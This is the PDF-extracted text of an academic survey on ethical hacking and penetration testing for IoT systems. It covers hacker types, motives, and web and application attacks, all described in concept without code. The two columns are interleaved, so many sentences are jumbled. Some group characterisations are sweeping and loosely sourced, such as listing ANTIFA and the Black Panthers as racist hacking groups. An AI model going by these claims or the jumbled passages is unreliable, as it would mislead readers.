Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Contents lists available at ScienceDirect

Internet of Things and Cyber-Physical Systems

journal homepage: www.keaipublishing.com/en/journals/
internet-of-things-and-cyber-physical-systems

Ethical hacking for IoT: Security issues, challenges, solutions

and recommendations
Jean-Paul A. Yaacoub a, Hassan N. Noura a, Ola Salman b, *, Ali Chehab b
a
Univ. Bourgogne Franche-Comt
e (UBFC), FEMTO-ST Institute, CNRS, Belfort, France
b
American University of Beirut, Department of Electrical and Computer Engineering, Lebanon

A R T I C L E I N F O A B S T R A C T

Keywords: In recent years, attacks against various Internet-of-Things systems, networks, servers, devices, and applications
Internet-of-things (IoT) witnessed a sharp increase, especially with the presence of 35.82 billion IoT devices since 2021; a number that
IoT ethical hacking could reach up to 75.44 billion by 2025. As a result, security-related attacks against the IoT domain are expected
IoT penetration testing
to increase further and their impact risks to seriously affect the underlying IoT systems, networks, devices, and
Internet of ethical hacking things (IoEHT)
IoT cyber-security
applications. The adoption of standard security (counter) measures is not always effective, especially with the
presence of resource-constrained IoT devices. Hence, there is a need to conduct penetration testing at the level of
IoT systems. However, the main issue is the fact that IoT consists of a large variety of IoT devices, firmware,
hardware, software, application/web-servers, networks, and communication protocols. Therefore, to reduce the
effect of these attacks on IoT systems, periodic penetration testing and ethical hacking simulations are highly
recommended at different levels (end-devices, infrastructure, and users) for IoT, and can be considered as a
suitable solution. Therefore, the focus of this paper is to explain, analyze and assess both technical and non-
technical aspects of security vulnerabilities within IoT systems via ethical hacking methods and tools. This
would offer practical security solutions that can be adopted based on the assessed risks. This process can be
considered as a simulated attack(s) with the goal of identifying any exploitable vulnerability or/and a security gap
in any IoT entity (end devices, gateway, or servers) or firmware.

1. Introduction employees and IT staff is also problematic, especially with the advanced
techniques of social engineering. Thus, a framework is presented, from
Due to the pervasive nature of IoT systems in our daily lives and our the users’ perspective, based on the main IoT domains.
constant ongoing reliance on them, the protection of IoT, although crit- In general, periodic and effective penetration testing and ethical
ical, is not that efficient due to the poor or absence of the right security hacking are mandatory. This can be achieved by evaluating the levels of
measures, for such a tremendous number of devices (75.44 billion by security/safety against known vulnerabilities and threats and conse-
2025, compared to 15.41 in 2015) [1], of which most of them are quently attacks via vulnerability assessment, foot-printing, and risk
resource-constrained [2]. evaluation. This work also highlights the importance of using machine
Malicious attackers are exploiting the IoT existing vulnerabilities and learning solutions to build automated security measures for IoT systems
security gaps [3], especially those caused by third parties [4]), which are for early detection of any possible vulnerability, and consequently, to
due to poorly and hastily configured IoT devices, gateways, servers, avoid the corresponding attacks.
networks. Thus, rendering the applications prone to cyber-physical at- The main objective of this work is to highlight the importance of
tacks. This paper presents the concepts of ethical hacking, penetration ethical hacking in performing and conducting penetration testing on IoT
testing and vulnerability assessment in the context of IoT, and discusses systems against a variety of cyber attacks [5]. This helps with the eval-
the different types of security vulnerabilities and attacks that could be led uation of the levels of security and immunity of a given IoT entity against
against IoT components, along with their impact in terms of the essential known and unknown threats, through assessment and mitigation, and
security services, mainly, confidentiality, integrity, availability, and thus, increases the levels of awareness, safety and security.
authentication. Moreover, the lack of training and awareness among

* Corresponding author.
E-mail address: [email protected] (O. Salman).

https://doi.org/10.1016/j.iotcps.2023.04.002
Received 29 December 2022; Received in revised form 1 April 2023; Accepted 7 April 2023
Available online 25 April 2023
2667-3452/© 2023 The Authors. Published by Elsevier B.V. on behalf of KeAi Communications Co., Ltd. This is an open access article under the CC BY license (http://
creativecommons.org/licenses/by/4.0/).
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

1.1. Related work testing in the IoT domain while presenting different approaches from
different authors.
Our paper expands the already presented work which discusses the
Evaluation: of how penetration testing is used to evaluate the secu-
importance of ethical hacking [6,7] and penetration testing [8,9] in a rity and protection levels in IoT against different possible potential
both general and generic manner. Moreover, recent studies also analysed attacks.
the digital forensics and anti-forensics concept for IoT systems and
Security & Safety Procedures: are presented in a suitable way that
components, which is presented, described, and analysed in Refs. [10,11] maintains a secure environment pre/post and during an IoT incident.
but with little or no information concerning the ethical hacking, nor its
Presentation and Analysis: of vulnerabilities based on each
relation with the IoT. In addition to what is presented, this paper studies component of IoT entity.
and analyses the motivations of ethical hackers after identifying and
classifying them to supplement the work done in Refs. [12,13] to identify 1.3. Organisation
the main IoT vulnerabilities and consequently attacks [14] that can be
detected, avoided and mitigated through simulated ethical hacking at- This paper is divided into ten sections aside the introduction and is
tacks as part of penetration testing, and to suggest suitable security so- presented as follows (see Fig. 1): in section 2, the IoT background and
lutions and modern countermeasures. Moreover, this paper assesses the overview are presented including IoT systems, applications, vulnerabil-
main IoT vulnerabilities and specifies IoT-related risks and how to ities via penetration testing, in addition to the identification of hackers
mitigate them, while analyzing different approaches from different au- including their motives and gains. In section 3, cyber-attacks against
thors. Unlike the presented work in Ref. [15], which analyses the current different IoT fields are presented, including their types and activities.
cyber-security certification schemes, our work focuses on the main se- Real-case events, vulnerability exploits and assessment against IoT sys-
curity threats, attacks, and issues that can affect the IoT domain from an tems are presented in section 4. In section 5, the ethical hacking domain
ethical hacking perspective [16]. presented IoT-related security attacks is presented in terms of IoT, including its life-cycle, tools, challenges and
that can be mitigated using Machine Learning (ML) methods. However, issues. section 6, penetration testing is further expanded in terms of IoT,
this work rather relies on the adoption of the ethical hacking concept including its testing tools, knowledge types, testing appliance and
where ML is one of the main security solutions. Moreover [17], discussed existing solutions. IoT security and safety procedures are presented in
security-related challenges and threat sources in IoT applications. Addi- section 7, especially in terms of IT security policy and incident response.
tionally, this work includes discussing security-related issues against IoT The lessons learnt are presented in section 8, while future research di-
servers, devices, systems, and applications alike [18]. presented an rections, suggestions and recommendations are presented in section 9
analysis of IoT security from 2016 to 2018, its trends, and open issues. and section 10, respectively. In section 11, we conclude our work.
However, this work rather focuses on current and recent issues that
surround the IoT domain instead, especially from a cyber-security 2. IoT: background & overview
viewpoint [19]. presented a study on the state-of-the-art IoT security
threats, vulnerabilities, and possible attacks while presenting possible The remarkable rise of IoT devices and domains, requires a significant
solutions for improving the IoT security architecture. In addition to the innovation that improves the wireless range, overall performance, easi-
presented work, our paper further expands this work, while also dis- ness of use, efficiency, and interoperability, to solve key issues related to
cussing real-case attacks and zero-day exploits, as well as the proper traffic and transportation, energy, and waste management without
security measures and counter-measures that are or should be adopted to affecting the resource/power budget. In fact, IoT is based on smart
avoid similar attack cases. For the best of our knowledge, ethical hacking equipped devices with embedded technologies that allow them to either
for IoT systems is partially described with no in-depth discussion nor a automatically or selectively collect information from IoT servers and
close linkage together with the IoT systems. Therefore, there’s a need for databases before aggregating them to connect and communicate with
a work that discusses the possible implementation of Ethical hacking in other users’ end-devices via device-to-device communications using
several IoT key parts. Unlike previous surveys, this paper covers the sensor technology and actuators [25]. As a result, IoT 2.0 may as well
appliance of ethical hacking in a variety of IoT fields, especially medical become the new replacement for traditional IoT by becoming the ”In-
[5], cyber-physical [20], long-range [21] and power-lines communica- telligence of Things” [26].
tions [22], as well as robotics [23,24]. In this section, the necessary background to further explain IoT sys-
tems, in addition to the processes of identification of IoT hackers are
introduced. Also, it highlights their motives and gains through their
1.2. Contribution performed cyber-activity in parallel with the adopted cyber-attack
structure. Finally, a suitable framework for IoT will be presented. How-
In this paper, a new holistic and analytical viewpoint is presented to ever, before starting, it is important to define two main concepts which
offer a better understanding of how ethical hacking and penetration are ”ethical hacking” and ”penetration testing” to explain the difference
testing can be linked and applied to IoT systems mainly through a to avoid confusing them with each other [27]. Ethical hacking is more
vulnerability assessment. In fact, the importance of this work is that it flexible in simulating (cyber-physical) attack methods and approaches
focuses on covering even a broader range of IoT vulnerabilities, chal- (i.e., phishing, brute force, social engineering, etc), while allowing a
lenges, threats, and consequently attacks while analyzing their presented thorough assessment. Ethical hackers offer recommendations about
security solutions based on all the targeted IoT components, which are best-practice security solutions to adopt against security gaps. Penetra-
listed in Fig. 6. tion Testing primarily focuses on the system weaknesses [28], allowing
Thus, the contributions of this paper can be summarised as follows: targeted tests to be performed on a specific IoT component (i.e device,
mobile, desktop, iPad, etc). Even though limited in its testing range,

Methodical Way: of classifying and analyzing IoT hackers based on pen-testing offers a higher accuracy in detecting and exposing these flaws
their motives and gains in a more detailed and specific way. before addressing them [29]. In other words, ethical hacking relies on

Analytical Study: of how to assess IoT vulnerabilities in terms of IoT- adopting a variety of simulated attacks in realistic scenarios via hacking
related risks. techniques to uncover security flaws and vulnerabilities, verify the IoT

Analysis: of most known IoT attacks, their structure, and how to system’s security, and secure any possible gaps. On the other hand,
mitigate them. penetration testing, being one aspect of ethical hacking, focuses more on

Detailed Understanding: on how penetration testing is linked to verifying both safety and security of the IoT’s defense systems [30,31].
ethical hackers, and how ethical hackers conduct their penetration Next, we describe IoT networks, the known IoT attacks, and in Fig. 3,

281
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Fig. 1. Visual Structure of this survey paper.

we summarize the concepts of ethical hacking, and how they could be devices, gateways, and application servers to present the best security
applied within IoT domains. practices that are not computationally expensive nor energy exhaustive,
especially for limited and resource-constrained IoT devices [5].
In IoT-related military, law enforcement and police fields, there are
2.1. IoT systems
increasing demands to apply ethical hacking to ensure that systems,
servers, and devices are protected from any cyber or/and physical at-
As part of its enormous growth, the IoT test architecture is set to
tacks, especially attacks linked to (cyber) sabotage [37], espionage [38],
become more advanced, standardized, and universally applicable in the
spying, cyberwarfare [39], terrorism [40,41], web defacement and
near future with multi-technology convergence [32]. As a result, the
(distributed) denial of service.
embedded IoT systems, applications, and devices will become more
Fig. 3 shows a set of possible applications that benefit from IoT, as
prone to ongoing persistent challenges, and ethical hackers are in a
briefly described below:
constant race to capture the ever-growing threats, and to identify the
main exploitable vulnerabilities that surround them to present suitable

Medical Systems: healthcare systems have become digitized with the
security solutions. Table 1 summarizes the most frequently used IoT
ability to achieve remote monitoring and diagnosis, along with the
tools. As shown in Fig. 2, an IoT network consists of devices that are
ability to perform tele-medical operations, and implant smart medical
connected to a data center (or application servers) through a gateway,
devices. As a result, the IoMT domain became prone to a variety of
such as the case of LoRa end-devices [21] that are connected via wireless
cyber-attacks (mostly ransomware and phishing) [42] that target the
channels to several gateways.
patients’ privacy, mostly targeting medical records and inter-
Currently, the ethical hacking domain is being extensively adopted in
rupting/intercepting operations [43]. Hence, it is very important to
IoT systems, applications, devices, mobile devices, servers, and networks
adopt the Ethical Hacking for IoT approach to detect security and
to search, scan, detect, and investigate IoT-related vulnerabilities and
vulnerability gaps to reduce the likelihood of these events from
security gaps. Thus, the introduction of an ethical hacking process to be
occurring [44].
integrated into IoT would lead to the Internet of Ethical Hacking Things

Industrial Systems: especially cyber-physical systems such as smart
(IoEHT), or Ethical Hacking for IoT (EHIoT).
factories, smart grids, power grids, smart enterprises and smart cities,
which rely on constant data transmission between these IoT distrib-
2.2. IoT applications uted systems, made them prone to a variety of cyber-attacks (i.e
worm) mostly linked to sabotage and espionage acts such as the case
The adoption of ethical hacking in IoT systems and applications is of targeting the US grids, as well as the ongoing cyber-war between
increasing to cover all IoT fields including but not limited to Medical IoT Israel and Iran [45,46], Russia and Ukraine [47,48], including attacks
[5], Industrial IoT (IIoT), Internet of Cyber-Physical Things (ICPoT), against Ukrainian nuclear facilities, [49,50]. This made the Industrial
Internet of Powerlines Things (IoPT) [22], Internet of Agricultural Things Control Systems (ICS) and other smart devices, systems, and servers
(IoAT), Internet of Communication Things (IoCT) (i.e LoRaWAN) [21], the most vulnerable to these attacks. Hence the reliance on the EHIoT
and Internet of Military Things (IoMT)/Internet of Battlefield Things concept is highly recommended to not only detect possible security
(IoBT) [33,34]. This also includes Internet of Robotics Things (IoRT) [23, gaps but also how to enhance them and ensure a higher reactive
24], especially modular robots and Unmanned/Autonomous Aerial, response by First Incident Responders Team (FIRT).
Ground, Surface, Underwater and Underground vehicles [35,36].
Traffic Control Systems: especially AI-based Intelligent traffic con-
More specifically, ethical hacking for IoT was used to evaluate the trol Systems with the ability to offer early detection, prediction, and
levels of safety and security of IoT systems, servers, applications, end- prevention of any network traffic congestion or road closures [51] to
prevent accidents and avoid traffic problems via a constant collection
Table 1 of data traffic [52] are also prone to attacks. These attacks can have
Most prominent IoT pen testing tools. control of all traffic signs or can even jam, control or redirect traffic,
Name Type Description
or even intercept and manipulate transmitted data. Hence, the EHIoT
should be adopted to discover these vulnerabilities and security gaps
Binwalk Firmware Extraction Analyses IoT Device’s Firmware,
to prevent such fatal accidents from possibly occurring.
Tool Retrieves File Systems Contents
Fiddler Open-Source Web Used to Debug, Manipulates/Reuses HTTP
Agriculture Systems: as agriculture and farming are being fully in-
Application Requests, Allows Users to Track tegrated into IoT, especially Agriculture 4.0 to ensure smart farming,
Firmwalker Bash Script Scans Extracted Files from IoT Firmware crops monitoring and watering, and other tasks, except that they
Maltego Open-Source Real-Time Analysis via Information
became more prone and susceptible to cyber-attacks [53]. These at-
(CE) Intelligence & Gathering Using Open-Source Intelligence
Forensics
tacks are mostly related to security concerns that affect the data that is
SAINT Static Taint Analysis Protects Cloud-Facing IoT from XSS, CSRF being transmitted which would reduce its accuracy and hinder agri-
Program and SQLi, Tracks the Information Flow cultural/farming efforts. This is achieved by targeting IoT supply

282
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Fig. 2. An Example of Internet-of-Things System with n IoT Devices, k Aggregation Nodes & m Servers. Aggregator nodes might not exit and IoT devices can connect
gateways directly.

Fig. 3. Ethical Hacking in Different IoT-related domains.

chains, data, networks, and applications [54]. As a result, EHIoT sensitive banking information [57]. As a result, ethical hacking
should be adopted and employed to detect any vulnerability or se- should be employed to detect any device, network, or system
curity gap to patch and update it, as such attacks can seriously affect breaches, while detecting keyloggers on devices and skimmers on
the food chain. ATM booths. This can help protect and safeguard IoT banking sectors,

Banking and Finance Systems: most financial institutions are now especially devices, systems, servers, and applications, reduce security
integrated into the IoT domain with the online transaction being breaches, as well as detect to act and react against any possible se-
performed on a daily continuous basis, as well as other operations curity breach or event (i.e attack).
such as e-commerce and e-banking ecosystem, net-banking, Unified
IoT Robotic Systems: robotics, which are now being integrated into
Payments Interface (UPI), and cloud computing. As a result, they all of the IoT-related domains such as medical, agriculture, industry,
became prone to several cyber-attacks (i.e DDoS attack against banking, search and rescue, military (combat/reconnaissance), law
Ukraine including PrivatBank and Oschadbank on February 2022) enforcement, etc evolved to include modular robotic types [58], as
[55,56], security threats and vulnerability exploit targeting cus- well as the swarm robotics [59]. This includes Unmanned Ground
tomers, important documents, financial details, classified and Vehicles (UGV), Unmanned Underground Vehicles (UUgV),

283
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Unmanned Surface Vehicles (USV), Unmanned Underwater Vehicles other IoT-related systems (indirect attack) or against their internal sys-
(UUwV), and Unmanned Aerial Vehicles (UAVs) [23,24]. This left tems (i.e software or application). This is done by detecting (via recon-
them prone to a variety of IoT robotic-related attacks especially tar- naissance and scanning) the vulnerabilities or/and security gaps,
geting the network and communication aspects, as well as systems, followed by exploitation.
gateways, and devices. Hence, the EHIoT aspect should also be Given the fact that 1) IoT systems rely on typical Operating Systems
adopted and applied to detect any vulnerability and security gap to (OS), 2) use the Internet for interconnection and to connect to either
prevent any future security breaches. application servers at the edge or in the cloud, and 3) mobile devices are

Military Installation Systems: as military installations/embassies used to access IoT systems, IoT penetration testing (PT) involves com-
are being more and more digitized and AI-based, they became targets puter PT, network PT, and mobile PT.
[60,61] for cyber-attacks by their opponents, especially with the
employment of (jamming/signal) Electronic Measures (EM) and 2.4. Identifying hackers
Electronic Counter-Measures (ECM). These installations also became
a target for cyber-terrorists and hacktivists [62,63]. As a result, Before proceeding any further, it is important to categories hackers in
cyber-armies were established with cyber-units to perform defense, terms of their aim, objectives and goals, to try and build a bigger picture
offense, or/and counter-offense duties. Hence, the concept of ethical about each classification and try to understand and figure out what are
hacking is extensively being employed especially under the concept of their main targets against an IoT domain.
game theories.

Police and Law Enforcement Systems: as all forms of electronic
State/Nation Sponsored: This type of hacker is employed by a given
records became digitized, sensitive police information and records government with open and even unlimited resources available at
related to criminals, victims, convicts and police officers are also their disposal, in addition to the employment and use of very
prone to cyber-attacks and can be leaked mostly through exploits and advanced sophisticated tools. This helps them exploit any security
ransomware attacks, such as the case of the Washington, D.C., gap or vulnerability to gain confidential information about another
Metropolitan Police Department ransomware attack on May 2021 rival government to stay on the lead [70]. Moreover, this also allows
[64]. them to achieve further goals based on influencing a government
election, like when Russia was accused of interfering in the US elec-
In the following, we explain the background of hackers and ethical tions in 2016 [71].
hacking and its corresponding classification in detail, along with how it is
Hacktivists: Hacktivism usually occurs when a hacktivist mainly
closely linked to the IoT domain including its devices, systems, servers, hacks for either a social or political agenda, mainly to protest against
applications, etc. a government’s actions or military actions [72,73]. They are based on
an anonymous or even a covert group which can either be local,
2.3. IoT vulnerabilities: penetration test regional, or/and international. Such type of hackers relies on tar-
geting and hacking IoT systems, including a government, a military
In IoT systems including digital systems, robotic systems, cyber- website, or/and an organisation in order to grab some media atten-
physical systems, power-lines, medical and agricultural system etc, at- tion to propagandize their own objectives and goals [74]. Their fa-
tackers will use existing vulnerability tools (or develop their own) to vorite attack types are (but are not limited to) Denial of Service and
detect (via searching and scanning) vulnerabilities that can be useful to Web Defacement.
plan and conduct an internal/external attack. Such vulnerabilities can
Cryptojackers: are also called cryptocurrency mining hackers whose
exploit IoT applications via weak access controls, malicious third parties, aim is to exploit network vulnerabilities to steal end devices’ re-
cryptographic failures, injection exploits, security gaps, insecure design, sources to mine cryptocurrencies after exploiting their weaknesses
data integrity failures, outdated components, identification and authen- and vulnerabilities [75]. This is usually achieved by spreading a
tication failures [65], IoT devices via system misconfigurations, spyware (i.e Trojan or Worm or Virus) across the Web that downloads
unpatched software, malicious insider threats, zero-day exploits, poor automatically on the victim’s device and works quietly with the vic-
data encryption, old anti-virus, weak vulnerability detection and lack of tim’s knowledge.
cyber-security Vulnerability Assessment [66], IoT servers via injection
Gaming Hackers: have their full focus on the online gaming virtual
flaws, weak authentication, missing function level Access Control, world, especially with the presence of scammers [76]. Their aim is
exposure of sensitive data, security misconfiguration, system configura- also to hack the game and exploit its bugs or to even target online
tion and directory exploits [67], and IoT networks (which can be streamers, famous players, or professional players and hack their
hardware-based, software-based, and human-based) via unauthorised accounts or gaming channels. This can either be for personal reasons
access, denial of service, malicious code/data injections, insider threats or sent by rival competitors to stream snipe them or have their ac-
and privilege escalation [68,69]. Therefore, the main challenge is to not counts banned or deactivated. AI-based bots can also be used as a
only identify these vulnerabilities and security gaps but to also fix them. means to hack/hijack players gaming accounts or to launch DDoS/-
A task that can be very challenging, since it requires defining new spe- DoS attacks to bring the game servers down [77].
cialised countermeasures and security measures to preserve IoT systems,
Cyber-Spy: Hackers or even whistle-blowers might also be employed
devices, gateways, application/network servers, and architecture. This by a given national or international intelligence agency in order to
task’s complexity is due to the fact that IoT systems consist of a different perform cyber-spying, cyber-sabotage, cyber-espionage, cyber-war-
set of technologies, software, hardware, middleware, and applications, as fare [78,79] or cyber-intelligence [80,81] task(s) [82,83] against a
well as resource-constrained devices. For this reason, the technical skills given government, military or terrorist target(s). It is mainly done to
for any Internet of Things - Penetration Testing (IoT-PT) should be high conduct cyber-espionage operation(s), or a covert information gath-
and diverse to cover various IoT systems’ components including com- ering to retrieve essential information about their targets for further
puters, networks, cloud/fog, mobiles, etc, where new majors and do- exploitation and further cyber-attacks (i.e Espionage/Reconnais-
mains need to be introduced to fulfill the gap and leave IoT-PTs capable sance) [84]. In fact, they can also be employed by rival organisations
of specializing in one IoT-related domain, rather than cover a wider to conduct industrial cyber-espionage for industrial data theft.
general aspect.
Cyber-Heist: Cyber-heist is usually achieved when the attackers try
Unfortunately, all threat types come from the same sources that aim to steal as much money as possible from a large number of known
to target IoT systems and compromise devices, gateways, servers, ap- online bank accounts, in the least amount of time, mainly targeting
plications, and components, to launch internal/external attacks against Internet of Financial Things (IoFT). Such attacks are usually achieved

284
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

either through hacking or even phishing, where they are cashed out in
Racism: Many hacking attacks were also led by racist racial groups
a single unique operation, targeting either the customer of a given including the KKK and Neo-Nazis, QAnon [121], Black Panthers
bank, or the bank itself [85]. A prime example of that is the [122], ANTIFA along many other racist groups [123], based on
Bangladesh bank cyber-heist [86], and the cyber capabilities of North hacking with the purpose of ensuring a racial supremacy, hate
Korea [87]. preaching [124], or trolling [125]. It can also be classified as a

Script Kiddie: exclusively rely on copying codes and scripts to different form of terrorism led and performed in order to target other
perform malicious code injection (i.e SQLi) or and modification, minorities by spreading fear and terror, online [126].
mostly. Moreover, Script Kiddies rely on already-made programs in
order to use them. Script kiddies also focus on the use of DoS and D- 2.6. Hacking gains
DoS attacks to hit the availability of an IoT-given system, website, or
device [88]. This section is dedicated to classify them into either commercial

Cyber-Criminals: Hackers can also commit cyber-crimes, hence they gains, financial gains, personal gains, or even political. In fact, it depends
are known as cyber-criminals [89] when they try to perform and on the motives of the intended hacking group, their background, and
commit their attacks online. All of the crimes mentioned above, along ability to wage cyber-attacks against the IoT domain.
with other crimes can be classified as cyber-criminal acts, and
sometimes, cyber-terrorist acts [90].
Economic: Hackers do rely on targeting IoT’s economy for multiple

Cyber-Insurgents/Terrorists: Cyber-terrorists also rely on the reasons. Such reasons depend on their intended objectives and aims.
internet [74] in order to lead and perform online attacks [91,92] to In fact, they can be employed by rival organisations to target another
cause serious economic implications [93] against IoT systems, net- competitive organisation and reveal its business secrets and trades.
works, servers and devices alike. Such cyber-attacks are mainly based Moreover, they might also be employed to cripple the economy of a
on information leakage, web-defacement [94], or even Denial of given organisation by hitting its online available services [127].
Service (DoS) and Distributed Denial of Service (DDoS) attacks. This Furthermore, it seems like cyber crimes are responsible for around
is all due to the fact that terrorists’ knowledge is very limited in the $12 million per business annually [128].
cyber-world. However, it is also evolving using different methods
Financial: Financial gains are on top of priority of hackers. Moreover,
[95], techniques [96] and tactics [97], adopted by different groups they are a crucial pumping source of money theft and money laun-
[98]. A prime example of that is Houthis [99], Hamas (green hats) dering, of which hackers heavily rely on as an illegal source of income
[100,101] and the Palestinian Islamic Jihad (PIJ) [102] cyber capa- and funding. The global cost of a serious cyber-attack can lead to $
bilities [103,104], Al-Qaeda’s cyber wing [105], Al-Nusra Front 120 billion of losses. According to the PwC’s Global State of Infor-
[105] and ISIS’s cyber-caliphate, cyber-recruiting [106,107], mation Security Survey 2018 [129], the total cost for a financial
cyber-Jihad and e-terrorism [108,109]. incident was 857 000 euros, a cost that is high especially for IoT

Suicide Hackers: Suicide hackers are hackers who aim at hacking for systems.
a given purpose in order to achieve their intended objectives and
Personal: Personal gains are another aspect, especially when a
goals without taking into consideration the impact of their action rogue/unsatisfied employee (or whistle-blower) is kicked out of a
[110,111]. given organisation. In fact, their aim shifts towards taking revenge
against his own organisation. Such a move is done, by selling secrets
to rival organisations, or disclosing the organisation’s sensitive in-
2.5. Hackers’ motives formation [130]. The main aim and goal of this move is to either
damage their reputation, scam and blackmail, or disclose their per-
It is also important to understand the motives [112] behind IoT at- sonal information.
tacks, and to shed some light on hackers’ backgrounds, and the reasons
Political: Political gains are also of a high priority for a given political
for launching their cyber-attacks against IoT systems. party, which can operate within the same country, or even against a
foreign country’s political law. Therefore, hacking can be the new

Political: Political motives are usually based on targeting govern- weapon to affect voting polls, or even election polls. In fact, Russia
ment’s official websites either through DoS and DDoS attacks or was accused of interfering with the US elections in 2016 [71]. Such
through web defacement. This is done to register a protesting state- move is aimed at influencing another country through a political
ment against the government’s new law, or a new agreement on alliance achieved by paid propaganda and media, which plays a
military action against another government. Such moves can be crucial and essential role in affecting the public’s opinion.
usually led by anti-war hackers [113] as a cyber-protest and
demonstration. 3. Targeted IoT cyber-attacks

Patriotic: or national motives are based on using hacking as a method
to register an official protest as part of condemning a given act against Targeted attacks are presented according to their aims against IoT
a given country. Hence, relying on hacking as a form of ”cyber-pro- systems: network, firmware, users/personnel, device or application.
test”. In fact, it looks very similar to hacktivism. Except that the main First, it is important to describe the cyber-attacks’ structure.
difference is based on a given national group targeting a given
country or an individual. The most known example occurred when 3.1. Cyber-attack types
Chinese hackers did send series of DDoS attacks against American and
NATO websites as a form of protest against the bombing of the Chi- Cyber-attack structures eventually differ depending on the attack
nese embassy in Belgrade, in 1999 [114,115]. type, as well as the motives, knowledge, experience and skills of the

Religious: Religious motives are are mostly based on extremist views attacker. Moreover, the attack structure also depends on the available
or/and radicalism (i.e takfir), and is another reason for committing a resources at the hackers’ disposal. As a result, the cyber-attack structure
cyber-crime in the name of a certain religion. Such attacks were is divided and presented as follows: coordinated, distributed, organised,
formerly led by Al-Qaeda [116] and now ISIS/ISIL [117,118], more focused and precised. This is summarised in the following Fig. 4.
specifically, ISIS cyber-wing (cyber-caliphate), to either recruit on- In fact, cyber-attacks against IoT are not limited to one aspect and
line, spread propaganda, or communicate with their sleeping cells in classification since they target a variety of IoT systems within the
western countries to perform terrorist attacks mainly across Africa different IoT domains. In fact, there are endless classifications with
and the Middle East [119,120]. countless attacks. The aim of this paper is to present the most common

285
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Fig. 4. Attacks against IoT-related domains.

known types of attack that hackers and criminals use, while also pre- confidentiality, message authentication, and replay protection [137].
senting suitable security measures to mitigate and overcome them. Key-reuse (rekeying) can be exploited to perform password attacks.
Other attacks include Triple Handshake, as well as SSL Stripping
3.1.1. Web attacks attack, STARTTLS Command Injection (CVE-2011-0411) attack,
Web attacks are primary classified as attacks that target websites, or BEAST (CVE-2011-3389) attack, Padding Oracle and its variant
use websites as a launching platform for their remote cyber-attacks. POODLE attack (CVE-2014-3566), which are further described in
Among these attacks, their main types are presented as follows: Ref. [138].

Sessions Hijack: also known as session hijacking or key-to-gain

Cookies Hijack: attack steals the magic cookie that authenticates a unauthorised access to the IoT device’s information session [139].
user to the remote server. HTTP cookies are also used to a multi- It usually occur when the ”Pass-the-Cookie” technique is used [140]
website session, due to the easiness of stealing them from their vic- to perform ”blind” hijacking or man-in-the-middle attacks using
tim’s devices [131]. sniffing programs.

CoAP-based Attacks: Constrained Application Protocol (CoAP) is an
Masquerade Attacks: usually target connected networks and devices
application layer and a specialised web-based transfer protocol used with weak authorisation by using a fake (network) identity to gain
with IoT constrained nodes and constrained networks to enable unauthorised access to personal information (E.g usernames, pass-
constrained devices (i.e sensors) [132] to join IoT networks with low words, logons, logins etc.) through legitimate access [141]. This
bandwidth and low availability. Thus offering lower latency and attack can be performed by insiders (whistle-blowers within the
power consumption [133]. In fact, CoAP is a simplified version of organisation) or outsiders (remotely).
HTTP for IoT or Wireless Sensor Networks (WSNs). Despite its
Buffer Overflow: or buffer overrun is a program anomaly that
advantage, CoAP is prone to a variety of attacks such as overruns and overwrites a buffer’s boundary with adjacent memory
Cross-Protocol, Hijacking, DoS, Man-In-The-Middle, Replay, Relay, locations [142]. C and Cþþ, Java and Python are common pro-
Sniffing and Spoofing attacks [134]. A solution to overcome several of gramming languages associated with buffer overflows. Such attack
CoAP-based attacks was the presentation of a secure authentication would result into overwriting adjacent data, overwriting executable
and access control scheme for CoAP-based IoT by Obaidat et al. in code(s), memory access errors, incorrect results, and constant
Ref. [135]. crashing. Cryptographic and non-cryptographic solutions were pre-

DTLS-based Attacks: since Transport Layer Security (TLS) intends to sented to protect against buffer overflow attacks in Ref. [143]. Bound
reliably deliver data stream using end-to-end authenticated encryp- checking is a suitable solutions, but requires additional processing
tion, Datagram Transport Layer Security (DTLS), which is a commu- time. Moreover, randomizing memory layout and deliberately leave
nications protocol is also used to deliver authenticated and encrypted buffer space are other suitable solutions to overcome buffer overflow
end-to-end datagram-based application data with lower latency Operating Systems (OS) attacks.
[136]. DTLS is used to deal with packet reordering, datagram loss,
Website Spoofing: includes creating fake (hoax) websites that
and data that is larger than the datagram network packet. Thus, of- mislead readers into believing its legitimacy by masquerading it as a
fering as a channel security protocol an integrated key management, legitimate website through a very similar design including similar
parameter negotiation, and secure data transfer. DTLS protocol is Uniform Resource Locator (URL) or Cloaked URL, and a shadow copy
based on the stream-oriented Transport Layer Security (TLS) protocol of the World Wide Web [144]. Website spoofing is always associated
to prevent eavesdropping, tampering, or message forgery, and relies with phishing or e-mail spoofing.
on the Secure Real-time Transport Protocol (SRTP) to provide

286
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Malicious Code Injection Attacks: usually occur on poorly config- permits a website to show every HTTP request to any given network
ured and poorly secured web applications [145] for IoT users. In fact, address [153].
they can be easily exploited by any hacker through a malicious code
injection or an SQL injection attack. As a result, this malicious script 3.1.2. Application attacks
will be running on the victim’s device without their knowledge [146]. Application attacks against the IoT can take many forms from covert
Therefore, registering keystrokes or/and retrieving all of the users attacks (surveillance) to much more overt ones such as viruses. This
credentials including emails, passwords, credit card numbers, along paper discusses the main most frequent attacks that take place against the
with cookies, browsers, and the device’s/user’s ID. IoT applications.

SQL Injection Attacks: The impact of SQL injection attacks varies
depending on the objective and aim of a given hacker [147]. Such an
Scareware: uses social engineering techniques to trick their victims
aim is based on either manipulating database information, gathering into downloading/purchasing unwanted dangerous rogue software
sensitive data, or even executing a DoS attack. In Ref. [148], SQL (ransomware) by using fear as their tactic [154]. This is caused by
injections were divided into three different categories. These cate- urging users to download a fake software (i.e Anti-Virus) to remove a
gories include three order attacks. The first order attack, is based on recently detected (fake) virus to remove it. Scareware can take many
the attacker entering a malicious string to modify the executed code. forms including antivirus, anti-spyware, firewall application or a
Second order attack, is based on the injection into a storage executed registry cleaner. Scareware may include a clickjacking feature that
by another action. Third order attack is the later injection, where the redirects users to malicious website that triggers a malware download
